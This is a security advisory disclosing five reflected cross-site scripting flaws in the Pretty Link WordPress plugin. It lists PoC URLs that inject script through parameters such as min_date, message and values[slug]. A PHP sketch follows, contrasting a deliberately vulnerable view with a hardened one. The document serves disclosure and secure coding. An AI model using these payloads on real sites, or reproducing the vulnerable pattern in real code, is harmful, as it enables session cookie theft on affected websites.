Cross-site Scripting Vulnerabilities in Pretty Link WordPress Plugin

2011-09-21T00:00:00
ID HTB23049
Type htbridge
Reporter High-Tech Bridge
Modified 2011-09-21T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pretty Link WordPress Plugin which could be exploited to perform cross-site scripting attacks.

1) Cross-site scripting (XSS) vulnerabilities in Pretty Link WordPress Plugin
1.1 Input passed via the "min_date" GET parameter to /wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
1.2 Input passed via the "message" GET parameter to /wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
1.3 Input passed via the "prli_blogurl" and "values" GET parameters to /wp-content/plugins/pretty-link/classes/views/prli-links/form.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?values[slug]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?values[name]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?values[description]=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?values[redirect_type][307]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?values[redirect_type][301]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
1.4 Input passed via the "errors" GET parameter to /wp-content/plugins/pretty-link/classes/views/shared/errors.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
1.5 Input passed via the "page_first_record", "page_last_record", "record_count", "controller_file" and "page_params" GET parameters to /wp-content/plugins/pretty-link/classes/views/shared/table-nav.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_record=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_last_record=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&record_count=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&current_page=2&controller_file=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&current_page=2&page_params=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires that "register_globals" is enabled.
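All five findings share one root cause: a view file that is reachable by direct request and echoes variables it never initialises, so a PHP install with "register_globals" enabled lets the query string define them. The following PHP sketch is added here as an illustration and is not the plugin's own source; it contrasts that shape with the hardened form (ABSPATH guard, explicit initialisation, context-specific escaping), and its file, variable and function names are assumptions.

```php
<?php
// Added illustration of the pattern in this advisory; not the plugin's own
// source. File, variable and function names are assumptions.

// Vulnerable shape: a view file reachable by direct request that reads
// $min_date without ever initialising it. With register_globals = On, PHP
// defines $min_date from ?min_date=... before this code runs, and the
// value is echoed unescaped into an attribute.
function render_min_date_vulnerable() {
    global $min_date;   // ambient value, attacker-controlled via the query string
    return '<input type="text" name="min_date" value="' . $min_date . '" />';
}

// Hardened shape for the same view.
// 1. Refuse direct requests: ABSPATH is only defined when the file is
//    loaded through WordPress, so it never runs as a bare script.
if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

// 2. Take input explicitly and initialise every variable the view uses;
//    nothing is left for register_globals to fill in (and the setting
//    itself should be Off at the PHP level).
$min_date    = isset( $_GET['min_date'] ) ? sanitize_text_field( $_GET['min_date'] ) : '';
$description = isset( $_GET['description'] ) ? sanitize_text_field( $_GET['description'] ) : '';

// 3. Escape on output for the context the value lands in: esc_attr()
//    inside an attribute, esc_textarea() inside a <textarea>, where a
//    literal "</textarea>" (the values[description] case above) would
//    otherwise close the element early.
function render_min_date_hardened( $min_date, $description ) {
    $html  = '<input type="text" name="min_date" value="' . esc_attr( $min_date ) . '" />';
    $html .= '<textarea name="description">' . esc_textarea( $description ) . '</textarea>';
    return $html;
}

echo render_min_date_hardened( $min_date, $description );
```

The ABSPATH guard alone already defeats the direct-request PoCs above, and the explicit initialisation removes the dependence on register_globals even where an operator cannot turn it off.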